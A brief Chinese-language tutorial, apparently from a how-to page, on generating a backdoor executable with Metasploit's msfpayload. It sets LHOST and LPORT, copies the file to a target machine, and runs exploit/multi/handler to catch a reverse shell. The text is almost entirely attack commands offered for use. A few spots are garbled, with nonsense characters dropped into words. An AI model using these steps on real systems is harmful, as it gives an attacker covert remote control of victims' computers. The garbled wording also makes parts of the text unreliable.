1、输入msfpayload -h
2、输入msfpayload -l 查看可以使用的模块。
3、选择适合的模块输入命筠沭鱿漆令msfpayload 模块名称 LHOST=本机ip地址 LPORT=本地监听端口(一般取大一些防止端口冲突) X > 输出的文件名.exe
4、使用命令ls -l 查看后门是否生成,后门生成后copy到目标主机。
5、使用msfconsole启动metasploit控制台,加载 exploit/multi/handler
6、输入 set payload 刚才生成时你用的模块(必须和刚才相同),set LHOST=本机ip地址set LPORT=本机监听端口
7、最后一步 输入exploit 开始汰拶珏茧监听,当有计算机运行该后门时,metasploit获得反弹shell。渗透成功
